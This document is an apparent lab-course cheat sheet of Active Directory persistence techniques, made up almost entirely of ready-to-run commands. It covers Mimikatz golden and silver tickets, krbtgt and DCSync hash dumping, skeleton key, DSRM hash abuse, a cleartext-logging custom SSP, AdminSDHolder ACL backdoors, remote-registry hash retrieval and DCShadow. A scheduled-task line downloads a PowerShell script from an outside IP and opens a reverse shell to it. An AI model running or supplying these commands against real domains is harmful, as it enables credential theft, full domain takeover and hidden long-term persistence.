Persistance

Golden Ticket

# Run as DA locally on DC to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
​
# Run Remotely as DA to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
​
# Get Domain-SID:
Get-DomainSID
​
# Get Domain Ticket policy:
(Get-DomainPolicy)."kerberos.policy"
​
# Create ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
​
# Use ticket:
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
​
# Access
​
ls \\domain-dc\c$
​
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'

Silver Ticket

# Using DC$ hash to provide access to domain shares on DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-211874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'
​
# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'
​
## Schedule task with above silver ticket
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443"
schtasks /Run /S dc.DOMAIN.local /TN "User"
​
# To execute wmi need HOST and RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'

Skeleton Key

# Creating skeleton key
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local
​
# Using Skeleton Key (Password is "mimikatz")
Enter-PSSession –Computername dc –credential DOMAIN\Administrator

DSRM (Directory Services Restore Mode)

DSRM password is needed when setting up a DC and is the local administrator password. By making some reg changes, it is possible to use the DSRM hash in a PTH attack. Gives DA that is very unlikely to change.

# Dump DSRM passwords (requires DA):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc
​
# Change Reg:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
​
# Pass the DSRM hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH /run:powershell.exe"'

Custom SSP

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.

Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
​
# Using mimikatz, inject into lsass (Not stable with Server 2016):
Invoke-Mimikatz -Command '"misc::memssp"'
​
# All log ons are now logged in clear too:
C:\Windows\system32\kiwissp.log

ACL Abuse - AdminSDHolder

Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups ( called Protected Groups). Propogates across AD every hour.

PowerView
ADModule
PowerView
# Giving a user full rights over AdminSDHolder groups:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose
​
# Giving user reset password rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
​
# Giving user WriteMember privs:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose
​
# Check Domain Admins permission as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}
​
# Abuse FullControl (powerview_dev):
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
​
# Abusing ResetPassword (powerview_dev):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText Force) -Verbose
​
# Add DCSYNC rights to a user:
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
ADModule
# Giving a user full rights over AdminSDHolder groups:
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,D C=local' -Principal student1 -Verbose
​
# Check Domain Admins permission as normal user:
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}
​
# Abuse FullControl:
Add-ADGroupMember -Identity 'Domain Admins' -Members testda
​
# Abusing ResetPassword:
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText Force) -Verbose
​
# Add DCSYNC rights:
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose
# Run SDProp manually using Invoke-SDPropagator.ps1:
Invoke-SDPropagator -timeoutMinutes 1 -showProgress Verbose
​
# For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance timeoutMinutes 1 -showProgress -Verbose

ACL Abuse - Security Descriptors

It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.

WMI
PSRemote
Remote Registry
WMI
# On local machine for student1:
Set-RemoteWMI -UserName student1 -Verbose
​
# On remote machine for student1 without explicit credentials:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
​
# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator –namespace 'root\cimv2' -Verbose
​
# On remote machine remove permissions:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose
PSRemote
# On local machine for student1:
Set-RemotePSRemoting -UserName student1 -Verbose
​
# On remote machine for student1 without credentials:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose
​
# On remote machine, remove the permissions:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove
Remote Registry
# Using DAMP, with admin privs on remote machine:
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
​
# As student1, retrieve machine account hash:
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
​
# Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
​
# Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

DCShadow - Forest Persistance

Machine needs to be part of the parent domain. Can be changed in the system properties with admin access. Requires user to be a valid user for that domain too, so may need to add them first. Will require comp restart.

Requires 2 consoles. One as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.

# Setting up Fake DC
.\mimikatz.exe
mimikatz# !+
mimikatz# !processtoken
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1
​
# On DA terminal
mimikatz -command '"lsadump::dcshadow /push"'

Allowing DCShadow to a user so they can do it without DA privs for persistance. Once done the user can run the /push terminal without DA. First terminal still needs SYSTEM privs.

Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose